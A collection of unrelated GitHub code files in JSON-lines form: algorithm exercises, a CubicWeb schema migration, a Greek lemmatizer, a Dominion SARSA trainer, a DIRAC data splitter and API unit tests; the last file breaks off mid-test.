{"seq_id":"75236483044","text":"import enum\n\nclass Results(enum.Enum):\n    SUBLIST = 0\n    SUPERLIST = 1\n    EQUAL = 2\n    UNEQUAL = 3\n\n\n# Possible sublist categories.\n# Change the values as you see fit.\nSUBLIST = Results.SUBLIST\nSUPERLIST = Results.SUPERLIST\nEQUAL = Results.EQUAL\nUNEQUAL = Results.UNEQUAL\n\n\ndef sublist(list_one, list_two):\n    if list_one == list_two:\n        return EQUAL\n\n    r = SUBLIST\n    if len(list_one) > len(list_two):\n        list_one, list_two = list_two, list_one\n        r = SUPERLIST\n\n    for i in range(len(list_two) - len(list_one) + 1):\n        if list_one == list_two[i:i + len(list_one)]:\n            return r\n\n    return UNEQUAL\n","repo_name":"IsaacG/exercism","sub_path":"python/sublist/sublist.py","file_name":"sublist.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"36278723948","text":"from collections import deque\n\nclass Node:\n\tdef __init__(self, name, nodes=None, number=None):\n\t\t# use None instead of a mutable default so instances never share one list\n\t\tself.name = name\n\t\tself.nodes = nodes if nodes is not None else []\n\t\tself.number = number\n\tdef __repr__(self):\n\t\treturn \"<Node %s>\" % self.name\n\nclass Tree:\n\tdef __init__(self, nodes=None, HEAD=None):\n\t\tself.nodes = nodes if nodes is not None else set()\n\t\tself.HEAD = HEAD\n\n# Tree from the pluralsight.com Algorithmics Course used as an example\n\n\nprint('''\n--------------------------------------------\n\tStarting DFS\n--------------------------------------------\n''')\n\n\nA = Node('A')\nB = Node('B')\nC = Node('C')\nD = Node('D')\nE = Node('E')\nF = Node('F')\nG = Node('G')\nH = Node('H')\nI = Node('I')\n\nA.nodes = [B, C]\nB.nodes = [D, E]\nC.nodes = [E, F]\nD.nodes = [G]\nE.nodes = []\nF.nodes = [G, H, I]\nG.nodes = [D, E]\nH.nodes = []\nI.nodes = []\n\nnode_set = {A, B, C, D, E, F, G, H, I}\ndfs_tree = Tree(nodes=node_set, HEAD = A)\n\nSTACK = []\ndfs_count = 1\n\ndfs_starting_node = dfs_tree.HEAD\ndfs_starting_node.number = 
dfs_count\ndfs_count+=1\n\n\n\ndef traverse_tree(starting_node):\n\tglobal dfs_count\n\tfor node in starting_node.nodes:\n\t\t# If node has been visited, just go to the next node in the stack\n\t\tif node.number is not None:\n\t\t\tcontinue\n\t\t# We're stacking from right to left\n\t\tSTACK.append(node)\n\t\tprint(\"Added %s\" % node)\n\tprint(\"Current Stack: [%s]\" % ', '.join([i.name for i in STACK]))\n\tif STACK:\n\t\tnew_node=STACK.pop()\n\t\t# Only tag nodes that haven't been visited\n\t\tif new_node.number is None:\n\t\t\tnew_node.number=dfs_count\n\t\t\tdfs_count+=1\n\t\treturn traverse_tree(new_node)\n\telse:\n\t\tprint(\"Stack empty. Ending recursion.\")\n\t\treturn\n\ntraverse_tree(dfs_starting_node)\n\ndfs_number_dict = {node.name: node.number for node in dfs_tree.nodes}\n\nprint('''\nNode Order:\n''')\n\nfor k, v in sorted(dfs_number_dict.items()):\n\tprint(\"Node %s: %s\" % (k, v))\n\n\nprint('''\n--------------------------------------------\n\tStarting BFS\n--------------------------------------------\n''')\n\nA = Node('A')\nB = Node('B')\nC = Node('C')\nD = Node('D')\nE = Node('E')\nF = Node('F')\nG = Node('G')\nH = Node('H')\nI = Node('I')\n\nA.nodes = [B, C]\nB.nodes = [D, E]\nC.nodes = [E, F]\nD.nodes = [G]\nE.nodes = []\nF.nodes = [G, H, I]\nG.nodes = [D, E]\nH.nodes = []\nI.nodes = []\n\nnode_set = {A, B, C, D, E, F, G, H, I}\nbfs_tree = Tree(nodes=node_set, HEAD = A)\n\nQUEUE = deque([])\nbfs_count = 1\n\nbfs_starting_node = bfs_tree.HEAD\nbfs_starting_node.number = bfs_count\nbfs_count+=1\n\n\ndef traverse_tree_bfs(starting_node):\n\tglobal bfs_count\n\tfor node in starting_node.nodes:\n\t\t# If node has been visited, just go to the next node in the stack\n\t\tif node.number is not None:\n\t\t\tcontinue\n\t\t# We're stacking from right to left\n\t\tQUEUE.append(node)\n\t\tprint(\"Added %s\" % node)\n\tprint(\"Current Queue: [%s]\" % ', '.join([i.name for i in QUEUE]))\n\tif QUEUE:\n\t\tnew_node=QUEUE.popleft()\n\t\t# Only tag nodes that haven't been visited\n\t\tif new_node.number is None:\n\t\t\tnew_node.number=bfs_count\n\t\t\tbfs_count+=1\n\t\treturn traverse_tree_bfs(new_node)\n\telse:\n\t\tprint(\"Queue empty. 
Ending recursion.\")\n\t\treturn\n\ntraverse_tree_bfs(bfs_starting_node)\n\nbfs_number_dict = {node.name: node.number for node in bfs_tree.nodes}\n\nprint('''\nNode Order:\n''')\n\nfor k, v in sorted(bfs_number_dict.items()):\n\tprint(\"Node %s: %s\" % (k, v))\n\n","repo_name":"szuckerman/linked_list_examples","sub_path":"depth_first_search.py","file_name":"depth_first_search.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74783484965","text":"\nfrom functools import partial\n\nfrom yams.constraints import UniqueConstraint\n\nfrom cubicweb.schema import PURE_VIRTUAL_RTYPES\nfrom cubicweb.server.schema2sql import build_index_name, check_constraint\n\nsql = partial(sql, ask_confirm=False)\n\nsource = repo.system_source\nhelper = source.dbhelper\n\n# drop all relations primary keys\nfor table, cstr in sql('''\n SELECT DISTINCT tc.table_name, tc.constraint_name\n FROM information_schema.table_constraints tc,\n information_schema.key_column_usage kc\n WHERE tc.constraint_type = 'PRIMARY KEY'\n AND kc.table_name = tc.table_name\n AND kc.table_name LIKE '%\\_relation'\n AND kc.table_schema = tc.table_schema\n AND kc.constraint_name = tc.constraint_name;\n'''):\n sql('ALTER TABLE %s DROP CONSTRAINT %s' % (table, cstr))\n\nfor table, cstr in sql(\"\"\"\n SELECT DISTINCT table_name, constraint_name FROM information_schema.constraint_column_usage\n WHERE table_name LIKE 'cw\\_%' AND constraint_name LIKE '%\\_key'\"\"\"):\n sql('ALTER TABLE %s DROP CONSTRAINT %s' % (table, cstr))\n\nfor rschema in schema.relations():\n if rschema.rule or rschema in PURE_VIRTUAL_RTYPES:\n continue\n if rschema.final or rschema.inlined:\n for rdef in rschema.rdefs.values():\n table = 'cw_{0}'.format(rdef.subject)\n column = 'cw_{0}'.format(rdef.rtype)\n if rschema.inlined or rdef.indexed:\n old_name = '%s_%s_idx' % (table.lower(), column.lower())\n sql('DROP INDEX IF EXISTS %s' % old_name)\n source.create_index(cnx, table, column)\n else:\n table = '{0}_relation'.format(rschema)\n sql('ALTER TABLE %s ADD CONSTRAINT %s PRIMARY KEY(eid_from, eid_to)'\n % (table, build_index_name(table, ['eid_from', 'eid_to'], 'key_')))\n for column in ('from', 'to'):\n sql('DROP INDEX IF EXISTS %s_%s_idx' % (table, column))\n sql('CREATE INDEX %s ON %s(eid_%s);'\n % (build_index_name(table, ['eid_' + column], 'idx_'), table, column))\n\n# we changed constraint serialization, which also changes their name\n\nfor table, cstr in sql(\"\"\"\n SELECT DISTINCT table_name, constraint_name FROM information_schema.constraint_column_usage\n WHERE constraint_name LIKE 'cstr%'\"\"\"):\n sql(\"ALTER TABLE %(table)s DROP CONSTRAINT %(cstr)s\" % locals())\n\nfor cwconstraint in rql('Any C WHERE R constrained_by C').entities():\n cwrdef = cwconstraint.reverse_constrained_by[0]\n rdef = cwrdef.yams_schema()\n cstr = rdef.constraint_by_eid(cwconstraint.eid)\n with cnx.deny_all_hooks_but():\n cwconstraint.cw_set(value=unicode(cstr.serialize()))\n if cstr.type() not in ('BoundaryConstraint', 'IntervalBoundConstraint',\n 'StaticVocabularyConstraint'):\n # These cannot be translate into backend CHECK.\n continue\n cstrname, check = check_constraint(rdef, cstr, helper, prefix='cw_')\n args = {'e': rdef.subject.type, 'c': cstrname, 'v': check}\n sql('ALTER TABLE cw_%(e)s ADD CONSTRAINT %(c)s CHECK(%(v)s)' % args)\n\ncommit()\n\nif 'identity_relation' in helper.list_tables(cnx.cnxset.cu):\n sql('DROP TABLE 
identity_relation')\n","repo_name":"gurneyalex/cubicweb","sub_path":"cubicweb/misc/migration/3.23.0_Any.py","file_name":"3.23.0_Any.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"43191518315","text":"import pandas as pd\r\n\r\nimport spacy\r\nnlp = spacy.load('el_core_news_sm') # pretrained statistical model for Greek\r\nbooks = pd.read_csv(\"../clear_phase/Processed-Books.csv\")\r\n\r\nbooks = books.head(10) #so as to compute quickly\r\n\r\n\r\n\r\ndef lemmatize(books):\r\n\r\n\r\n    tokenized_books = books\r\n    periexomena = []\r\n\r\n    for desc in tokenized_books['Περιεχόμενα']:\r\n        descInToken = []\r\n        #print(desc)\r\n        token = nlp(desc)\r\n\r\n        for w in token:\r\n            #print(w,w.lemma_)\r\n            descInToken.append(w.lemma_) # for every word, find its lemma\r\n\r\n        periexomena.append(descInToken)\r\n\r\n    #print(periexomena)\r\n    tokenized_books['Περιεχόμενα'] = periexomena # for every description, store all of its words as lemmas\r\n\r\n    return tokenized_books\r\n#tb = tokenize(books)\r\n\r\ntb = lemmatize(books)\r\n\r\n#print(tb['Περιεχόμενα'])","repo_name":"vlavrent/NLP-Book-Classifier","sub_path":"preprocessing_phase/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"74969068003","text":"from rl_agent import RLPlayer, RandomPlayer, BuyActRLplayer\nimport numpy as np\nimport tensorflow as tf\nimport pickle  # used by record_game() below but missing from the original imports\nfrom cards import copper, silver, gold, curse, estate, duchy, province, CARD_VECTOR_ORDER,variable_cards\nfrom game import Game, PlayerState, VICTORY_CARDS\nimport time\nimport random\n\nclass SarsaBootstrapAgent():\n    \"\"\"\n    Bootstrap DQL method in DQLSarsaAgent does not work that well.\n    Try using on-policy updates instead.\n    \"\"\"\n\n    def __init__(self, epochs=10, gamma=0.99):\n        self.epochs = epochs\n        self.target_iterations = 5\n        self.predict_iterations = 200\n        # number of samples drawn every time\n        self.mtrain = 2000\n        self.gamma = gamma\n        self.epsilon = 0.1\n        #self.create_model()\n        self.data = []\n        self.replaybuffer = 4e5\n        self.win_reward = 0\n        self.reward_points_per_turn = 0\n        self.VICTORY_CARDS = VICTORY_CARDS\n        self.variable_cards = variable_cards\n\n    def create_model(self, sa, target, num_layers=3, dropout=0.2):\n        def _make_model(num_layers, dropout):\n            layers = []\n            for _ in range(num_layers - 1):\n                layers.append(tf.keras.layers.Dense(128, activation='relu'))\n                layers.append(tf.keras.layers.Dropout(dropout))\n            layers.append(tf.keras.layers.Dense(30, activation='relu'))\n            layers.append(tf.keras.layers.Dropout(dropout))\n            layers.append(tf.keras.layers.Dense(1, activation='linear'))\n            model = tf.keras.models.Sequential(layers)\n            model.compile(optimizer='adam',\n                          loss='mean_squared_error',\n                          metrics=['mean_squared_error'])\n            return model\n        model = _make_model(num_layers, dropout)\n        # initiate network\n        model.fit(sa, target, epochs=1, verbose=1)\n        self.model_predict = model\n        # target network\n        model = _make_model(num_layers, dropout)\n        # initiate network\n        model.fit(sa, target, epochs=1, verbose=1)\n        self.model_target = model\n        return\n\n    def run(self, players):\n        game = self.setup(players, self.variable_cards, self.VICTORY_CARDS)\n        # seems to have a bug that does not terminate game\n        # set a limit of 5000 turns\n        k = 0\n        while not game.over():\n            if k > 5000:\n                print('terminate after 5000 turns!')\n                break\n            else:\n                game = game.take_turn()\n                k += 1\n        scores = 
[(state.player, state.score()) for state in game.playerstates]\n # This code is buggy... It picks the same guy when there's a tie\n #winner, _ = max(scores, key=lambda item: item[1])\n #loser, _ = max(scores, key=lambda item: item[1])\n # write stupid code instead. No win reward when there's a tie\n if scores[0][1] > scores[1][1]:\n winner = scores[0][0]\n loser = scores[1][0]\n win_reward_multiplier = 1\n elif scores[0][1] == scores[1][1]:\n win_reward_multiplier = 0\n winner = scores[0][0]\n loser = scores[1][0]\n else:\n winner = scores[1][0]\n loser = scores[0][0]\n win_reward_multiplier = 1\n # check if list is empty before adding reward\n if winner.rewards:\n winner.rewards[-1] += self.win_reward * win_reward_multiplier\n if loser.rewards:\n loser.rewards[-1] += -self.win_reward * win_reward_multiplier\n # append to vp the win_reward\n if winner.vp:\n winner.vp.append(self.win_reward * win_reward_multiplier)\n if loser.vp:\n loser.vp.append(self.win_reward * win_reward_multiplier)\n # add a reward that incentivize points per round\n for p, s in scores:\n p.rewards[-1] += 100 * s / k * self.reward_points_per_turn\n # add a reward of points per turn to act_reward also\n if p.vp != []:\n p.vp[\n -1] += s # add the final score to additional element of vp. this is used to calculate the reward for the final s,a\n p.vp[-1] += 100 * s / k * self.reward_points_per_turn\n return scores\n\n def scores_to_data(self, scores):\n \"\"\"\n Each data point consistes of a tuple (s,a,r,s',a',a'_opt)\n s: state\n a: action\n r: reward\n s': next state\n a'_opt: next state\n last_marker: 1 if it's the last state, 0 if not\n What do we do for the last step?\n set the training target to zero I guess\n\n \"\"\"\n for player, fs in scores:\n if not player.record_history:\n continue\n # for buy phase\n d_buy = []\n for i in range(len(player.states) - 1):\n s = np.array(player.states[i])\n a = np.array(player.actions[i])\n r = np.array(player.rewards[i])\n sn = np.array(player.states[i + 1])\n an = np.array(player.actions[i + 1]) # next action\n d_buy.append((s, a, r, sn, an,\n 0)) # 0 means that it is not the end of the sequence\n # deal with the last state\n s = np.array(player.states[-1])\n a = player.actions[-1]\n r = np.array(player.rewards[-1])\n d_buy.append((s, a, r, None, None, 1))\n # for action phase\n d_act = []\n if player.states_act: # if not empty\n for i in range(len(player.states_act) - 1):\n s_act = np.array(player.states_act[i])\n a_act = player.actions_act[i]\n r_act = np.array(player.vp[i + 1] - player.vp[i])\n sn_act = np.array(player.states_act[i + 1])\n an_act = np.array(player.actions_act[i + 1])\n d_act.append((s_act, a_act, r_act, sn_act, an_act,\n 0)) # 0 means not the end of sequence\n # deal with the last state, in run() function, we already appended the final score and terminal reward to player.vp\n # so player.vp is one longer than the other lists\n s_act = np.array(player.states_act[-1])\n a_act = player.actions_act[-1]\n r_act = np.array(player.vp[-1] - player.vp[-2])\n d_act.append((s_act, a_act, r_act, None, None, 1))\n final_score = {bot: fs for bot, fs in scores}\n\n return d_buy, d_act, final_score\n\n def record_game(self, n, players, filename='', verbose=1):\n \"\"\"\n run n games and record to data\n use the output of scores_to_data\n \"\"\"\n start_time = time.time()\n final_scores = {bot: [] for bot in players}\n d_buy = []\n d_act = []\n for i in range(n):\n if i % 100 == 0:\n print('Playing game# %d' % i)\n # clear player history\n for p in players:\n 
p.reset_history()\n db_this, da_this, fs = self.scores_to_data(self.run(players))\n d_buy += db_this\n d_act += da_this\n for bot, fs_this in fs.items():\n final_scores[bot].append(fs_this)\n print('Took %.3f seconds' % (time.time() - start_time))\n # show the winrate of bots in the recorded games\n bot1, bot2 = final_scores.keys()\n bot1win = np.sum(\n np.array(final_scores[bot1]) > np.array(final_scores[bot2]))\n bot2win = len(final_scores[bot1]) - bot1win\n bot1avg = np.mean(final_scores[bot1])\n bot2avg = np.mean(final_scores[bot2])\n if verbose:\n print({bot1: bot1win, bot2: bot2win})\n print({bot1: bot1avg, bot2: bot2avg})\n if filename != '':\n with open(filename, 'wb') as f:\n pickle.dump((d_buy, d_act), f)\n return (d_buy, d_act)\n\n def compute_target_old(self, data):\n \"\"\"\n compute_target use the target network to predict the Q value\n n is the next state\n with a Q(s,a) model\n compute r + gamma*max_a' Q(s',a')\n It outputs the target that the deep neural network wants to fit for.\n a' are the possible actions\n \"\"\"\n sa = []\n target = []\n for (s, a, r, ns, na, isend) in data:\n sa.append(np.concatenate([s, a]))\n if not isend:\n qn = self.model_target.predict(np.concatenate([ns, na]).reshape(1,-1))\n target.append(r + self.gamma * qn)\n else:\n target.append(r)\n sa = np.array(sa)\n target = np.array(target)\n return sa, target\n\n def compute_target(self, data):\n \"\"\"\n compute_target use the target network to predict the Q value\n n is the next state\n with a Q(s,a) model\n compute r + gamma*max_a' Q(s',a')\n It outputs the target that the deep neural network wants to fit for.\n a' are the possible actions\n Try to parallelize the model.predict() part\n this is 10 times faster that the old code\n \"\"\"\n safull = []\n ind = []\n target = []\n sa = []\n for i, (s, a, r, ns, na, isend) in enumerate(data):\n sa.append(np.concatenate([s, a]))\n target.append(float(r))\n if not isend:\n safull.append(np.concatenate([ns, na]).reshape(1, -1))\n ind.append(i) # record which data point each sa belongs to\n safull = np.concatenate(safull)\n ind = np.asarray(ind, dtype=int)\n Qp = self.model_target.predict(safull)\n for i in np.unique(ind): # loop over data point i that are not terminal s,a\n # pretty inefficient, but shouldn't be the bottle neck\n target[i] += self.gamma * Qp[np.where(ind == i)[0]]\n target = np.array(target)\n sa = np.array(sa)\n return sa, target\n\n\n def draw_sample(self):\n \"\"\"\n draw random samples from the full dataset generated\n \"\"\"\n # for buy training\n m = self.data[1].shape[0]\n select1 = np.random.choice(m, self.mtrain, replace=False)\n # for action training\n m = self.data[4].shape[0]\n select2 = np.random.choice(m, self.mtrain, replace=False)\n return tuple([d[select1, :] for d in self.data[:4]] +\n [d[select2, :] for d in self.data[4:]])\n\n ###### below are functions for generating training data\n def generate_data(self, ngames=50, fname=''):\n \"\"\"\n generate a new batch of data with the latest prediction model\n self.model_predict\n rl vs. 
random bot\n \"\"\"\n vbuy = lambda x: self.model_predict.predict(x)\n # vact = lambda x: self.model_act.predict(x)\n # p1 = BuyActRLplayer(vbuy, vact)\n p1 = RLPlayer(vbuy)\n p1.epsilon = self.epsilon\n p1.record_history = 1\n p1.include_action = 1\n p2 = RandomPlayer()\n p2.record_history = 0\n d_this, _ = self.record_game(ngames, [p1, p2], fname)\n self.add_data(d_this)\n return d_this\n\n def generate_data_smithy(self, ngames=50, fname=''):\n \"\"\"\n generate a new batch of data with the latest prediction model\n self.model_predict\n rl vs. smithy bot\n \"\"\"\n vbuy = lambda x: self.model_predict.predict(x)\n # vact = lambda x: self.model_act.predict(x)\n # p1 = BuyActRLplayer(vbuy, vact)\n p1 = RLPlayer(vbuy)\n p1.epsilon = self.epsilon\n p1.record_history = 1\n p1.include_action = 1\n p2 = SmithyBot()\n # try including smithy bot's data in the training.\n p2.record_history = 0\n d_this, _ = self.record_game(ngames, [p1, p2], fname)\n self.add_data(d_this)\n return d_this\n\n def generate_data_rl(self, ngames=50, fname=''):\n \"\"\"\n generate a new batch of data with the latest prediction model\n self.model_predict\n rl vs. smithy bot\n \"\"\"\n vbuy = lambda x: self.model_predict.predict(x)\n #vact = lambda x: self.model_act.predict(x)\n # p1 = BuyActRLplayer(vbuy, vact)\n p1 = RLPlayer(vbuy)\n p1.epsilon = self.epsilon\n p1.record_history = 1\n p1.include_action = 1\n p2 = RLPlayer(vbuy)\n p2.epsilon = self.epsilon\n p2.record_history = 1\n p2.include_action = 1\n d_this, _ = self.record_game(ngames, [p1, p2], fname, verbose=1)\n self.add_data(d_this)\n return d_this\n\n def save_model(self, fname='test'):\n self.model_predict.save_weights(fname + '_predict.h5')\n self.model_target.save_weights(fname + '_target.h5')\n return\n\n def load_model(self, fname='test'):\n self.model_predict.load_weights(fname + '_predict.h5')\n self.model_target.load_weights(fname + '_target.h5')\n return\n\n def compare_bots(self, bots, num_games=50):\n start_time = time.time()\n wins = {bot: 0 for bot in bots}\n final_scores = {bot: [] for bot in bots}\n for i in range(num_games):\n random.shuffle(bots)\n game = self.setup(bots, self.variable_cards, self.VICTORY_CARDS)\n results = game.run()\n maxscore = 0\n for bot, score in results:\n final_scores[bot].append(score)\n if score > maxscore:\n maxscore = score\n for bot, score in results:\n if score == maxscore:\n wins[bot] += 1\n break\n for bot in final_scores.keys():\n final_scores[bot] = np.mean(final_scores[bot])\n print('Took %.3f seconds' % (time.time() - start_time))\n return wins, final_scores\n\n def fit_target(self, data):\n \"\"\"Fit_target_network.\n\n Computes the target network prediction and fit for it with prediction\n network.\n \"\"\"\n # state, action, reward, next state\n sa, target = self.compute_target(data)\n self.model_predict.fit(sa, target, epochs=self.epochs, verbose=1)\n return\n\n def do_target_iteration(self):\n for j in range(self.target_iterations):\n #print('start target model iteration {:d}'.format(j))\n # set the weights of the target model to predict model\n self.model_target.set_weights(self.model_predict.get_weights())\n for i in range(self.predict_iterations):\n print('prediction model iteration {:d}'.format(i))\n self.fit_target(self.draw_sample())\n\n def draw_sample(self):\n \"\"\"Draws random samples from the full dataset generated.\"\"\"\n m = len(self.data)\n select = np.random.choice(m, self.mtrain, replace=False)\n return self.data[select]\n\n def add_data(self, data):\n if self.data == []:\n self.data = 
np.array(data)\n else:\n self.data = np.concatenate([self.data, np.array(data)])\n # truncate data down to replay buffer size\n if self.data.shape[0] > self.replaybuffer:\n print('truncate {:d} samples'.format(self.data.shape[0] -\n self.replaybuffer))\n self.data = self.data[-self.replaybuffer:]\n return\n\n def add_data_act(self, data):\n if self.data_act == []:\n self.data_act = np.array(data)\n else:\n self.data_act = np.concatenate([self.data_act, np.array(data)])\n # truncate data_act down to replay buffer size\n if self.data_act.shape[0] > self.replaybuffer:\n print('truncate {:d} samples'.format(self.data_act.shape[0] -\n self.replaybuffer))\n self.data_act = self.data_act[-self.replaybuffer:]\n return\n\n def setup(self, players, var_cards=(), VICTORY_CARDS=VICTORY_CARDS, simulated=True):\n \"\"\"Set up the game.\n\n Put this here because I want to try out different numbers of province. I'm\n hoping that in a longer game,\n the AI can learn to play engine.\n \"\"\"\n counts = {\n estate: VICTORY_CARDS[len(players)],\n duchy: VICTORY_CARDS[len(players)],\n province: VICTORY_CARDS[len(players)],\n curse: 10 * (len(players) - 1),\n copper: 60 - 7 * len(players),\n silver: 40,\n gold: 30\n }\n counts.update({card: 10 for card in var_cards})\n playerstates = [PlayerState.initial_state(p) for p in players]\n random.shuffle(playerstates)\n return Game(playerstates, counts, turn=0, simulated=simulated)\n","repo_name":"hungiyang/dominiate","sub_path":"dominiate/sarsa_on_policy_trainer.py","file_name":"sarsa_on_policy_trainer.py","file_ext":"py","file_size_in_byte":15048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19886695251","text":"from DIRAC import S_OK, S_ERROR\nfrom DIRAC.WorkloadManagementSystem.Splitters.BaseSplitter import BaseSplitter\n\nclass InputDataBySESplitter( BaseSplitter ):\n\n AFTER_OPTIMIZER = \"InputDataResolution\"\n\n def splitJob( self, jobState ):\n result = jobState.getManifest()\n if not result[ 'OK' ]:\n return result\n jobManifest = result[ 'Value' ]\n maxIDPerJob = max( 1, jobManifest.getOption( \"SplitterMaxFilesPerJob\", 1 ) )\n result = jobState.getInputData( )\n if not result[ 'OK' ]:\n self.jobLog.error( \"Could not retrieve input data: %s\" % result[ 'Message' ] )\n return result\n data = result[ 'Value' ]\n if not data:\n self.jobLog.error( \"No input data defined\" )\n return S_ERROR( \"No input data defined\" )\n seContents = {}\n for lfn in data:\n for seName in data[ lfn ][ 'Replicas' ]:\n if seName not in seContents:\n seContents[ seName ] = set()\n seContents[ seName ].add( lfn )\n\n manifests = []\n seCounters = dict( [ ( seName, 0 ) for seName in seContents ] )\n while seContents:\n seName = sorted( [ ( seCounters[ seName ], seName ) for seName in seCounters ] )[0][-1]\n seData = seContents[ seName ]\n lfns = []\n for i in range( maxIDPerJob ):\n try:\n lfn = seData.pop()\n except KeyError:\n break\n lfns.append( lfn )\n for otherSE in seContents:\n try:\n seContents[ otherSE ].remove( lfn )\n except:\n pass\n seCounters[ seName ] += len( lfns )\n if len( lfns ) < maxIDPerJob :\n seContents.pop( seName )\n seCounters.pop( seName )\n if lfns:\n self.jobLog.info( \"Generated manifest to %s with %s lfns\" % ( seName, len( lfns ) ) )\n manifest = jobManifest.clone()\n manifest.setOption( \"InputData\", \",\".join( lfns ) )\n manifest.setOption( \"SplitterChosenSE\", seName )\n manifests.append( manifest )\n\n return S_OK( manifests 
)\n","repo_name":"coberger/DIRAC","sub_path":"WorkloadManagementSystem/Splitters/InputDataBySESplitter.py","file_name":"InputDataBySESplitter.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"74163191526","text":"from datetime import datetime\nfrom .api_connections import RequestEventsRawData\nfrom .api_connections import RequestEventsInPeriod\nfrom .api_connections import EmptyRequest\nfrom .models import EventData\nfrom .models import EventLanguage\nfrom .models import LastUpdateEventDate\nfrom .views import populate_event_data\nfrom quero_cultura.views import ParserYAML\nimport requests_mock\nimport json\n\n\nclass TestLastUpdateEventDate(object):\n\n def test_last_update_event_date(self):\n LastUpdateEventDate.drop_collection()\n update_date = LastUpdateEventDate()\n create_date = datetime.now().__str__()\n update_date.create_date = create_date\n update_date.save()\n query = LastUpdateEventDate.objects.first()\n assert query.create_date == create_date\n\n\nclass TestEventLanguage(object):\n\n def test_event_language(self):\n EventLanguage.drop_collection()\n event_language = EventLanguage()\n instance = \"SP\"\n event_language.instance = instance\n language = \"Cinema\"\n event_language.language = language\n event_language.save()\n query = EventLanguage.objects.first()\n assert query.instance == instance\n assert query.language == language\n\n\nclass TestEventData(object):\n\n def test_event_data(self):\n EventData.drop_collection()\n event_data = EventData()\n instance = \"SP\"\n event_data.instance = instance\n occurrences = [\n {\n \"id\": 1147,\n \"space\": {\n \"id\": 14191,\n \"acessibilidade\": \"Sim\"\n }\n }\n ]\n event_data.occurrences = occurrences\n date = datetime(2017, 11, 14, 3, 5, 55, 88000)\n event_data.date = date\n age_range = \"Livre\"\n event_data.age_range = age_range\n event_data.save()\n query = EventData.objects.first()\n assert query.instance == instance\n assert query.occurrences == occurrences\n assert query.date == date\n assert query.age_range == age_range\n\n\nclass TestPopulateEventData(object):\n\n @requests_mock.Mocker(kw='mock')\n def test_populate_event_data(self, **kwargs):\n parser_yaml = ParserYAML()\n urls = parser_yaml.get_multi_instances_urls\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\",\n \"occurrences\":\n [{\"id\": 1147, \"space\": {\"id\": 14191,\n \"acessibilidade\": \"Sim\"}}]}]\n\n for url in urls:\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n LastUpdateEventDate.drop_collection()\n EventLanguage.drop_collection()\n EventData.drop_collection()\n\n populate_event_data()\n\n assert LastUpdateEventDate.objects.count() != 0\n assert EventData.objects.count() != 0\n assert EventLanguage.objects.count() != 0\n\n\nclass TestClassRequestEventsRawData(object):\n\n @requests_mock.Mocker(kw='mock')\n def test_success_request(self, **kwargs):\n current_time = datetime.now().__str__()\n url = \"http://mapas.cultura.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_raw_data = RequestEventsRawData(current_time, url)\n response_events_raw_data = request_events_raw_data.response\n response_status_code = 
response_events_raw_data.status_code\n assert response_status_code == 200\n\n @requests_mock.Mocker(kw='mock')\n def test_data_content(self, **kwargs):\n current_time = datetime.now().__str__()\n\n url = \"http://mapas.cultura.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_raw_data = RequestEventsRawData(current_time, url)\n events_raw_data = request_events_raw_data.data\n type_events_raw_data = type(events_raw_data)\n empty_list = []\n assert type_events_raw_data == type(empty_list)\n\n @requests_mock.Mocker(kw='mock')\n def test_data_lenght(self, **kwargs):\n current_time = datetime.now().__str__()\n url = \"http://mapas.cultura.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n request_events_raw_data = RequestEventsRawData(current_time, url)\n events_raw_data = request_events_raw_data.data_length\n type_events_raw_data = type(events_raw_data)\n intenger = 1\n assert type_events_raw_data == type(intenger)\n\n\nclass TestClassRequestEventsInPeriod(object):\n\n @requests_mock.Mocker(kw='mock')\n def test_success_request_in_period(self, **kwargs):\n year = 2013\n url = \"http://spcultura.prefeitura.sp.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_in_period = RequestEventsInPeriod(year, url)\n response_events_in_period = request_events_in_period.response\n response_status_code = response_events_in_period.status_code\n assert response_status_code == 200\n\n @requests_mock.Mocker(kw='mock')\n def test_data_content(self, **kwargs):\n year = 2013\n url = \"http://spcultura.prefeitura.sp.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_in_period = RequestEventsInPeriod(year, url)\n events_in_period = request_events_in_period.data\n type_events_in_period = type(events_in_period)\n empty_list = []\n assert type_events_in_period == type(empty_list)\n\n @requests_mock.Mocker(kw='mock')\n def test_data_lenght(self, 